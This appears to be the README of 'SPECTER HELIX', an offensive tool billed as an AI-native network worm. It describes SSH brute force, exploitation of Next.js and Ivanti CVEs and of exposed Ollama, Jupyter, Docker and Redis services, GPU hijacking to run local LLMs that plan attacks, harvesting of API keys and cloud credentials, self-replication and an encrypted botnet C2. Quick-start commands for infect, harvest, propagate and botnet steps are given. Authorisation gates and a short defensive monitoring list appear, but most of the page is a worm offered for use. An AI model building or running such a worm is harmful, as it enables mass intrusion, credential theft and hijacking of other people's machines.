SPECTER HELIX — AI-Native Network Worm

Overview

SPECTER HELIX is NIGHTFALL's Layer 41 module — AI-Native Network Worm. It implements a new species of malware: one where the LLM is the attack engine, not the target. Infected machines contribute GPU compute to the worm's inference pool. DeepSeek-R1 1.5b runs locally on seized hardware to generate tailored attack strategies for each new target. As the botnet grows, attack intelligence scales with it — cost of inference approaches zero.

HELIX opens attack surface coverage to infrastructure that was previously out-of-scope for AI-specific offensive tools: exposed Ollama endpoints, Jupyter notebooks, Docker sockets, Redis instances, Ivanti appliances, Next.js middleware, and SSH-accessible machines. The connecting thread: every compromised node adds LLM compute. Every LLM compute node makes the next compromise smarter.

SPECTER HELIX is an authorized security research tool. INJECT gate requires INJECT_KEY (Ed25519 private key path). UNLEASHED gate (autonomous propagation) requires ROE file containing "autonomous propagation authorised". DESTROY gate (botnet formation) requires ROE "botnet formation authorised" + --confirm-botnet-deploy. All reports signed HLX-{hex12}. Use only within authorized engagements.

CVE Coverage

CVE	Product	CVSS	Attack Type	HELIX Vector
`CVE-2025-29927`	Next.js Middleware	9.1 CRITICAL	Auth bypass via `x-middleware-subrequest` header	INFECT → CVE_2025_29927
`CVE-2024-9379`	Ivanti CSA	9.6 CRITICAL	Command injection via `/gsb/reports.php`	INFECT → CVE_2024_9379
`CVE-2025-0282`	Ivanti Connect Secure	9.0 CRITICAL	Stack-based buffer overflow, unauthenticated RCE	INFECT → CVE_2025_0282

Architecture: The HELIX Worm Loop

Propagation Cycle

SURVEY: Scan CIDR range. Detect open ports, fingerprint GPU presence, Ollama/vLLM endpoints, Docker socket, Redis, Jupyter, Ivanti, Next.js. Prioritise targets by attack_surface_score (GPU+10, inference+8, Ivanti+9, Docker+7, Jupyter+6).

INFECT: Dispatch best exploit vector. SSH brute (25 weak-cred + 6 GPU-user pairs). CWE-306: exposed Ollama/Jupyter/Docker/Redis. CVE-2025-29927 Next.js middleware bypass. CVE-2024-9379 Ivanti injection.

HIJACK: Detect nvidia-smi. Commandeer existing inference endpoints or bootstrap Ollama via SSH (deepseek-r1:1.5b or qwen2.5:0.5b fallback). Add to shared inference pool. MIN_VRAM: 4096 MB.

REASON: For each new target, POST fingerprint to inference pool → DeepSeek-R1 generates JSON attack strategy with <think> chain. Rule-based fallback if no GPU pool yet.

HARVEST: Extract API keys (10 regex patterns: OpenAI/Anthropic/AWS/HF/GitHub/Replicate), SSH private keys, ~/.aws/credentials, env vars, model paths from /proc/1/environ.

PROPAGATE: Base64-encode worm. SFTP transfer via paramiko. Execute bootstrap.sh on target. BFS depth-configurable. Each new node repeats from step 1 on its own subnets.

BOTNET: XChaCha20-Poly1305 encrypted TCP heartbeat to C2 on port 31337. Node registry with compute aggregation. Fleet summary: total GPU GB, inference endpoints, active nodes.

Subsystems

SURVEY OPEN

Network discovery: parallel port scan (64 workers, ThreadPoolExecutor), GPU detection, inference endpoint probing (Ollama/vLLM/llamacpp), Ivanti/Next.js fingerprinting, OS banner grabbing. Returns prioritised TargetHost list.

INFECT INJECT

Multi-vector exploitation: SSH brute-force (paramiko AutoAddPolicy), CWE-306 exposed service access (Ollama/Jupyter/Docker/Redis), CVE-2025-29927 Next.js middleware auth bypass, CVE-2024-9379 Ivanti CSA command injection. Auto-dispatches best_vector per target.

HIJACK INJECT

GPU resource seizure: detect nvidia-smi (local and remote via SSH), bootstrap Ollama on targets with sufficient VRAM (MIN_VRAM_MB=4096), pull DeepSeek-R1:1.5b or qwen2.5:0.5b fallback. Build shared inference pool from fleet.

REASON INJECT

LLM-powered attack strategy: fingerprint target → PromptTemplate → POST to Ollama/vLLM API → extract DeepSeek ⟨think⟩ reasoning chain → parse JSON AttackStrategy (vector, confidence, fallbacks, payload, credentials). Rule-based fallback when no inference pool.

HARVEST INJECT

Credential extraction via SSH: env vars (env | grep), 12 config file paths (~/.aws/credentials, ~/.kube/config, ~/.ssh/id_*), 10 API key regex patterns (OpenAI sk-proj-, Anthropic sk-ant-, AWS AKIA, GitHub ghp_/ghs_, HF hf_, Replicate r8_), /proc/1/environ.

PROPAGATE UNLEASHED

BFS self-replication: base64-encode worm source, SFTP transfer via paramiko, execute bootstrap.sh on target, check for HELIX_DEPLOYED_PID marker. Configurable depth and max_targets_per_hop. Requires ROE "autonomous propagation authorised".

BOTNET DESTROY

XChaCha20-Poly1305 C2 mesh (PyNaCl SecretBox): HelixC2 TCP server port 31337, threaded listener, node registry, 60s heartbeat. Fleet aggregation: total_compute_gb(), active_nodes(), inference_pool(). Requires ROE "botnet formation authorised" + --confirm-botnet-deploy.

REPORT OPEN

HLX-{hex12} Ed25519-signed canonical JSON reports. Build: stats (discovered/infected/GPU nodes/compute/hops), WMD classes, CVE references, MITRE techniques (T1190, T1059.004, T1110.001, T1496, T1041, T1584.005, T1071.001, AML.T0012/T0040/T0048), fleet botnet nodes.

WMD Classification

ai_native_network_worm gpu_resource_hijack_at_scale adaptive_botnet_formation autonomous_llm_attack_engine self_funding_cyberweapon

MITRE ATT&CK Mapping

Technique	Name	HELIX Behaviour
`T1190`	Exploit Public-Facing Application	CVE-2025-29927 / CVE-2024-9379 / CWE-306
`T1059.004`	Unix Shell	Command injection via Ivanti / bootstrap.sh
`T1110.001`	Brute Force: Password Guessing	SSH brute with 31-pair credential list
`T1496`	Resource Hijacking	GPU seizure via nvidia-smi / Ollama bootstrap
`T1041`	Exfiltration Over C2 Channel	API keys / SSH keys over encrypted TCP C2
`T1584.005`	Compromise Infrastructure: Botnet	XChaCha20-Poly1305 C2 fleet on port 31337
`T1071.001`	Application Layer Protocol: Web	Ollama /api/chat inference pool comms
`AML.T0012`	Valid Accounts — ML Pipeline	Credential harvest for ML API keys
`AML.T0040`	ML Model Inference API Access	LLM hijacking via exposed Ollama endpoints
`AML.T0048`	Steal ML Model	Model path enumeration during harvest

Gate Structure

Gate	Requirement	Unlocks
`OPEN`	None	SURVEY, REPORT
`INJECT`	`INJECT_KEY` env → Ed25519 key file	INFECT, HIJACK, REASON, HARVEST
`UNLEASHED`	INJECT + ROE file with "autonomous propagation authorised"	PROPAGATE (BFS self-replication)
`DESTROY`	UNLEASHED + ROE "botnet formation authorised" + `--confirm-botnet-deploy`	BOTNET (C2 mesh formation)

Quick Start

# Network discovery
specter-helix survey --target 10.0.0.0/24

# Infect a target [INJECT gate]
export INJECT_KEY=/path/to/key.ed25519
specter-helix infect --target 10.0.0.5

# Seize GPU compute [INJECT gate]
specter-helix hijack --target 10.0.0.5 --credential root:root

# Generate LLM attack strategy [INJECT gate]
specter-helix reason --target 10.0.0.5 --inference 10.0.0.5:11434

# Harvest credentials and API keys [INJECT gate]
specter-helix harvest --target 10.0.0.5 --credential root:root

# Self-replicate [UNLEASHED gate]
export UNLEASHED_KEY=/path/to/unleashed.ed25519
specter-helix propagate --target 10.0.0.0/24 --roe /path/to/roe.txt

# C2 formation [DESTROY gate]
export DESTROY_KEY=/path/to/destroy.ed25519
specter-helix botnet --port 31337 --roe /path/to/roe.txt --confirm-botnet-deploy

# Generate signed report
specter-helix report --targets-discovered 50 --targets-infected 12 --gpu-nodes 4 --compute-gb 80

Defensive Pair

SPECTER HELIX maps to AI Shield M-TBD HELIX SENTINEL (TBD). Monitor for: unusual Ollama bootstrap activity, outbound port 31337 TCP, nvidia-smi invocation from non-standard users, mass credential file reads, rapid SSH auth attempts from internal IPs.

Red Specter SPECTER HELIX